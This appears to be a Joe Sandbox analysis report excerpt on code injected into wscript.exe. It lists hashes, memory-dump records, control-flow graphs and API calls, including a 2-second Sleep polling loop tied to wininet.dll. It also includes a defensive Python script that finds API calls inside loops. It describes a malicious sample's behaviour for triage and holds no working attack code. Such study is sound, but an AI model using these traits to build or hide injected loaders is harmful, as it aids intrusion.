• Opcode Fuzzy Hash: bd82444856bed58548c441bf307f6eaadb065f8503de15c78d6c445b76fc939d
• Instruction Fuzzy Hash: CFE0C272200204BFD720EFA4CC44EDB7B68EF44360F104459F90EAB242C530E510CB90
APIs
• NtClose.NTDLL(02A14D50,?,?,02A14D50,00000000,FFFFFFFF), ref: 02A1A485
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
• Instruction ID: caaebf1f0d05a3afef909da6cbe30ccde6204b6b2363711ba77af55cd709ee9d
• Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
• Instruction Fuzzy Hash: 9ED01776251214ABD714EB98CC85EA77BADEF48760F15449ABA189B242C930FA00CAE0
APIs
Memory Dump Source
• Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
• Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 75b22f478c23315e758411c4970c7da482a593561412c46583ea1c91e2457aec
• Instruction ID: c9a33e336981e9a2238e90c595223e2180d16a2594b096db99ae847b05d90528
• Opcode Fuzzy Hash: 75b22f478c23315e758411c4970c7da482a593561412c46583ea1c91e2457aec
• Instruction Fuzzy Hash: D690023120140402F1007599540865600058BE0305F96D015A5125755EC669D9917131
APIs
Memory Dump Source
• Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
• Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: d6f2e11f085f8c68873a4d35adfbccfa5b27c8d278ea02a99766afa3d4314bbd
• Instruction ID: 7c5ff500dccad31e1c1fad7a7520007ebeaf9ae07f7c765f2b4030d881d1ded7
• Opcode Fuzzy Hash: d6f2e11f085f8c68873a4d35adfbccfa5b27c8d278ea02a99766afa3d4314bbd
• Instruction Fuzzy Hash: 1D90023120140842F10071594404B5600058BE0305F96C01AA0225754D8619D9517521
APIs
Memory Dump Source
• Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
• Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ca31bfd1127b76515fd9d2ffeee000d7c757f558be6804b679c39d6d53e09096
• Instruction ID: 651caf959a6dff8a47928ee42b05213f8f7c7d7ab165540a1d20d6aec22bf706
• Opcode Fuzzy Hash: ca31bfd1127b76515fd9d2ffeee000d7c757f558be6804b679c39d6d53e09096
• Instruction Fuzzy Hash: 9C90023120148802F1107159840475A00058BD0305F9AC415A4525758D8699D9917121
APIs
Memory Dump Source
• Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
• Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 859524d43ef83739ff45119f503b91aab445c407ccd472d5f6528d8be1f4f71d
• Instruction ID: d21a649846b56f064469cb71124a6244f95e0cdf9e7c88c8890ccebd4574f5db
• Opcode Fuzzy Hash: 859524d43ef83739ff45119f503b91aab445c407ccd472d5f6528d8be1f4f71d
• Instruction Fuzzy Hash: 2590023120140413F1117159450471700098BD0245FD6C416A0525758D965ADA52B121
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 3d99c33ee593d9da44464f933ef35ebd1ce2df3d01b1da28eb4b93b39dd8cf14
                                                                                                                                                                                                                      • Instruction ID: 2cdcefdbd2b3d9873c236d96a2bce2be7cd7f886105cc4657bd334e5be5426b3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3d99c33ee593d9da44464f933ef35ebd1ce2df3d01b1da28eb4b93b39dd8cf14
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41900221242441527545B159440451740069BE02457D6C016A1515B50C852AE956E621
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: c0dc31fa95dd5c11ea372aa03d793fe2ea299574c18ee2311322b6626d003a81
                                                                                                                                                                                                                      • Instruction ID: cde0228f571fa618ab931c9146b24fe5e4a099f865b02ce5b95adbb27c84f61e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c0dc31fa95dd5c11ea372aa03d793fe2ea299574c18ee2311322b6626d003a81
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B90022921340002F1807159540861A00058BD1206FD6D419A0116758CC919D9696321
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: d3f3543daafe7da19c74f14d638d42a243b104df97ec7a28abe680d6dda7ee15
                                                                                                                                                                                                                      • Instruction ID: 5e16768aa15078a82432b769ec6c997a730cb5020dc077ee3f4b3bc65780f38b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d3f3543daafe7da19c74f14d638d42a243b104df97ec7a28abe680d6dda7ee15
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6090027120140402F1407159440475600058BD0305F96C015A5165754E865DDED57665
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 9e02de4fc87ad7c90a6f1a7e961290eb63d5cc83614507340f1c9bd28c3d30bd
                                                                                                                                                                                                                      • Instruction ID: 848a5732dec254ed731cab230a92a535d26d769ae8f841369a2be3788a81db18
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e02de4fc87ad7c90a6f1a7e961290eb63d5cc83614507340f1c9bd28c3d30bd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7900221211C0042F20075694C14B1700058BD0307F96C119A0255754CC919D9616521
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 24ffa52a6e6cc75a16b03bd5c0c5259cb80251a7b7752bb67e7106cf671acffb
                                                                                                                                                                                                                      • Instruction ID: 89d42cd420aefba2d2889cf0956ab11a0bab3b26461829ca43bc1ade09c37163
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 24ffa52a6e6cc75a16b03bd5c0c5259cb80251a7b7752bb67e7106cf671acffb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8890026134140442F10071594414B160005CBE1305F96C019E1165754D861DDD527126
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 339ab821869f10f13da315733b71980f21c72a3b5a8e09d51fdb7f4ba9f87721
                                                                                                                                                                                                                      • Instruction ID: 123adce96829fb5d873cc20dfa722b06e36a2eff2a05bf1efb7639aca96720a7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 339ab821869f10f13da315733b71980f21c72a3b5a8e09d51fdb7f4ba9f87721
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D9900225211400032105B559070451700468BD5355396C025F1116750CD625D9616121
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: ac00d83289798f9d9ae39281a85950a27414f312084d4bdb9b5d8c481067b9d5
• Instruction ID: 395a97228bca1ad15427be2536b6124b4a8523856a2163e4c77d7aabda5b5030
• Opcode Fuzzy Hash: ac00d83289798f9d9ae39281a85950a27414f312084d4bdb9b5d8c481067b9d5
• Instruction Fuzzy Hash: 7790023120544842F14071594404A5600158BD0309F96C015A0165794D9629DE55B661
APIs
Memory Dump Source
• Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
• Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: dbfe7a220ab01ea7b3ad407feda8acd54616b537ba1ad0fdea77dfb15aa6a362
• Instruction ID: 3ec246e1477be9a79b2dfc5a792bfb40754428c60d6a3e00ffa4b8340c6e9422
• Opcode Fuzzy Hash: dbfe7a220ab01ea7b3ad407feda8acd54616b537ba1ad0fdea77dfb15aa6a362
• Instruction Fuzzy Hash: 7B90023120140802F1807159440465A00058BD1305FD6C019A0126754DCA19DB5977A1
APIs
Memory Dump Source
• Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
• Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 19986212c0af383ebfa8cdadea74d88084310d4bc3c55487c1a53f93aacf628a
• Instruction ID: ad749f32cef39f0225fde5224090ecb940c682d18784efa0e86291b536847da2
• Opcode Fuzzy Hash: 19986212c0af383ebfa8cdadea74d88084310d4bc3c55487c1a53f93aacf628a
• Instruction Fuzzy Hash: 4D90026120240003610571594414626400A8BE0205B96C025E1115790DC529D9917125
APIs
Memory Dump Source
• Source File: 00000008.00000002.4588781862.0000000004A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04A60000, based on PE: true
• Associated: 00000008.00000002.4588781862.0000000004B89000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004B8D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4588781862.0000000004BFE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_4a60000_wscript.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 1fdcb1e5693b10d9e505ed31606527ea788495b6449f75db79a533405e33eb8d
• Instruction ID: 55e88557a9dc62c31e2bba6aedce006fd605bd178c3e5acce671bf6945d7f3be
• Opcode Fuzzy Hash: 1fdcb1e5693b10d9e505ed31606527ea788495b6449f75db79a533405e33eb8d
• Instruction Fuzzy Hash: 4790023160550402F1007159451471610058BD0205FA6C415A0525768D8799DA5175A2

Control-flow Graph
control_flow_graph 399 2a19050-2a1907f 400 2a1908b-2a19092 399->400 401 2a19086 call 2a1bd10 399->401 402 2a19098-2a190e8 call 2a1bde0 call 2a0acf0 call 2a14e50 400->402 403 2a1916c-2a19172 400->403 401->400 410 2a190f0-2a19101 Sleep 402->410 411 2a19103-2a19109 410->411 412 2a19166-2a1916a 410->412 413 2a19133-2a19153 411->413 414 2a1910b-2a19131 call 2a18c70 411->414 412->403 412->410 415 2a19159-2a1915c 413->415 416 2a19154 call 2a18e80 413->416 414->415 415->412 416->415
APIs
• Sleep.KERNELBASE(000007D0), ref: 02A190F8
Strings
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: 30e68675f47128e6697a39df551ce3d373fe7b037c03455ab2d49be5d1f12590
• Instruction ID: 26e1d26cbb6c213fa610af46f9ba03918e97d43b7645ac7cafcda06417553522
• Opcode Fuzzy Hash: 30e68675f47128e6697a39df551ce3d373fe7b037c03455ab2d49be5d1f12590
• Instruction Fuzzy Hash: 6331B0B2940341ABC724DF64C8C5FA7B7B9BB48B10F00841DFA2A5B245DB30B654CBA8

Control-flow Graph
control_flow_graph 419 2a19049-2a19092 call 2a1bd10 422 2a19098-2a190e8 call 2a1bde0 call 2a0acf0 call 2a14e50 419->422 423 2a1916c-2a19172 419->423 430 2a190f0-2a19101 Sleep 422->430 431 2a19103-2a19109 430->431 432 2a19166-2a1916a 430->432 433 2a19133-2a19153 431->433 434 2a1910b-2a19131 call 2a18c70 431->434 432->423 432->430 435 2a19159-2a1915c 433->435 436 2a19154 call 2a18e80 433->436 434->435 435->432 436->435
APIs
• Sleep.KERNELBASE(000007D0), ref: 02A190F8
Strings
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: Sleep
• String ID: net.dll$wininet.dll
• API String ID: 3472027048-1269752229
• Opcode ID: 0580fe8453154d238eae4deea3b2d4fb2bbe8d82443424f7b81d6cc4b1d9294d
• Instruction ID: 7a56bdb3d23921174e8d4fdf6c4c492398c8acd6758e2cc2eae284173d634032
• Opcode Fuzzy Hash: 0580fe8453154d238eae4deea3b2d4fb2bbe8d82443424f7b81d6cc4b1d9294d
• Instruction Fuzzy Hash: 8021D2B2940341AFCB24DF68C8C5FABB7B5FB48710F10801DEA296B245DB70A654CFA4
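The two Sleep records above are the same function in the injected region at 0x02A00000 of wscript.exe (PID 8), reached from two entry points. Reading the graph data by hand: block 410 (0x2a190f0) calls Sleep with 0x7D0 (2000 ms), block 412 branches back to 410 or out to 403, so the 2-second sleep sits in a loop whose only exit is block 403 (0x2a1916c), and the string IDs attached to the function are net.dll and wininet.dll. The following script, added here as an example and not part of the Joe Sandbox report or of Joe Security's tooling, extracts that observation mechanically: it parses the control_flow_graph record and the API line, runs Tarjan's strongly-connected-components algorithm to find loops, and reports which logged API calls sit inside one. The token grammar it assumes (decimal block id, hex address or lo-hi range, optional "call <addr>" pairs, bare API labels, "src->dst" edges) is inferred from the records on this page rather than documented by Joe Sandbox, and the graph and API strings are copied from the records as constructed input.

```python
import re
from collections import defaultdict

# Constructed input: the control_flow_graph record and the Sleep API line copied from
# the Joe Sandbox function entry above (PID 8, wscript.exe, injected region 0x02A00000).
CFG_LINE = (
    "control_flow_graph 399 2a19050-2a1907f 400 2a1908b-2a19092 399->400 401 2a19086 call "
    "2a1bd10 399->401 402 2a19098-2a190e8 call 2a1bde0 call 2a0acf0 call 2a14e50 400->402 "
    "403 2a1916c-2a19172 400->403 401->400 410 2a190f0-2a19101 Sleep 402->410 411 "
    "2a19103-2a19109 410->411 412 2a19166-2a1916a 410->412 413 2a19133-2a19153 411->413 "
    "414 2a1910b-2a19131 call 2a18c70 411->414 412->403 412->410 415 2a19159-2a1915c "
    "413->415 416 2a19154 call 2a18e80 413->416 414->415 415->412 416->415"
)
API_LINE = "Sleep.KERNELBASE(000007D0), ref: 02A190F8"

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
RANGE_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$")
API_RE = re.compile(r"^(\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")

def parse_cfg(line):
    """Assumed token grammar (inferred from this page): decimal block id, then a hex address
    or lo-hi range, then 'call <hex>' pairs or bare API labels; 'src->dst' edges anywhere."""
    tokens = line.split()
    nodes, edges, cur, i = {}, [], None, 1
    while i < len(tokens):
        tok, edge = tokens[i], EDGE_RE.match(tokens[i])
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and RANGE_RE.match(tokens[i + 1]):
            cur = int(tok)
            lo, hi = RANGE_RE.match(tokens[i + 1]).groups()
            nodes[cur] = {"start": int(lo, 16), "end": int(hi or lo, 16), "calls": [], "apis": []}
            i += 2
        elif tok == "call":
            nodes[cur]["calls"].append(int(tokens[i + 1], 16))  # call into another function
            i += 2
        else:
            nodes[cur]["apis"].append(tok)  # resolved API label on the block, e.g. Sleep
            i += 1
    return nodes, edges

def parse_api_line(line):
    """'Api.MODULE(args), ref: addr' -> dict; '?' becomes None, non-hex args are kept raw."""
    name, module, args, ref = API_RE.match(line.strip()).groups()
    parsed = [None if a == "?" else int(a, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", a) else a
              for a in (args.split(",") if args else [])]
    return {"api": name, "module": module, "args": parsed, "ref": int(ref, 16)}

def strongly_connected(nodes, edges):
    """Tarjan's SCC algorithm; an SCC with more than one block (or a self-edge) is a loop."""
    succ = defaultdict(list)
    for s, d in edges:
        succ[s].append(d)
    index, low, stack, on_stack, comps = {}, {}, [], set(), []
    def visit(v):
        index[v] = low[v] = len(index)
        stack.append(v)
        on_stack.add(v)
        for w in succ[v]:
            if w not in index:
                visit(w)
                low[v] = min(low[v], low[w])
            elif w in on_stack:
                low[v] = min(low[v], index[w])
        if low[v] == index[v]:  # v roots an SCC: it and everything above it on the stack
            comp = set(stack[stack.index(v):])
            del stack[stack.index(v):]
            on_stack.difference_update(comp)
            comps.append(comp)
    for v in nodes:
        if v not in index:
            visit(v)
    return comps

def api_calls_in_loops(nodes, edges):
    """API label -> (sorted loop body, sorted exit blocks) for every API called inside a cycle."""
    self_loops = {s for s, d in edges if s == d}
    found = {}
    for comp in strongly_connected(nodes, edges):
        if len(comp) > 1 or comp & self_loops:
            exits = sorted({d for s, d in edges if s in comp and d not in comp})
            for n in sorted(comp):
                for api in nodes[n]["apis"]:
                    found[api] = (sorted(comp), exits)
    return found

def summarize(cfg_line, api_line):
    """Triage view: is the logged call inside a loop, and for Sleep, how long is each pass?"""
    nodes, edges = parse_cfg(cfg_line)
    call = parse_api_line(api_line)
    body, exits = api_calls_in_loops(nodes, edges).get(call["api"], ([], []))
    return {"api": call["api"], "in_loop": bool(body),
            "delay_ms": call["args"][0] if call["api"] == "Sleep" else None,
            "loop_head": hex(nodes[body[0]]["start"]) if body else None,
            "loop_exits": [hex(nodes[e]["start"]) for e in exits]}
```

summarize(CFG_LINE, API_LINE) reports the Sleep as in_loop with delay_ms 2000, loop head 0x2a190f0 and the single exit 0x2a1916c. Fed the RtlFreeHeap records further down the same way, parse_api_line keeps the .z` argument as a raw string and api_calls_in_loops returns nothing, because their two-block graphs contain no cycle; a Sleep that is not inside any cycle is a one-off delay rather than a polling loop, which is the distinction a triage script should surface.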

Control-flow Graph
control_flow_graph 556 2a1a632-2a1a657 call 2a1af30 558 2a1a65c-2a1a671 RtlFreeHeap 556->558
APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A03AF8), ref: 02A1A66D
Strings
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
• Opcode ID: 5bca1434af71235a765000b781c50ed5c4bf131192a700c4342c6be7842671a9
• Instruction ID: 9350811f43a986cdfa35a13eca46d04079c779f4db249b393d55c75ecbed873c
• Opcode Fuzzy Hash: 5bca1434af71235a765000b781c50ed5c4bf131192a700c4342c6be7842671a9
• Instruction Fuzzy Hash: 41F039B2261204ABD718EF58DC49EE777A9FF48760F118669FA485B242D631E811CBA0

Control-flow Graph
control_flow_graph 559 2a1a640-2a1a656 560 2a1a65c-2a1a671 RtlFreeHeap 559->560 561 2a1a657 call 2a1af30 559->561 561->560
APIs
• RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02A03AF8), ref: 02A1A66D
Strings
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID: .z`
• API String ID: 3298025750-1441809116
• Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
• Instruction ID: f2d9ccffe0fccf8c4c201a3cdc43543083b2810646007827f85b3880d96adb1e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 39E04FB12102046BD718DF59CC44EA777ADEF88760F014555FD0857241C630F910CAF0

Control-flow Graph
APIs
• PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02A0836A
• PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02A0838B
Memory Dump Source
• Source File: 00000008.00000002.4585739140.0000000002A00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A00000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_8_2_2a00000_wscript.jbxd
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
• Instruction ID: 93b7ceeefc38d2aff9f43169678d703b0c8750f358bf7e01b239453311cb5523
• Opcode Fuzzy Hash: 11db2db6729fad1b2fe29d12422f9571aab132b5507ffda246947416a0e543a6
• Instruction Fuzzy Hash: D001A731AC03287BE720A6949D42FFE776D5B40F54F050155FF04BA1C1EAA469054AF6

APIs
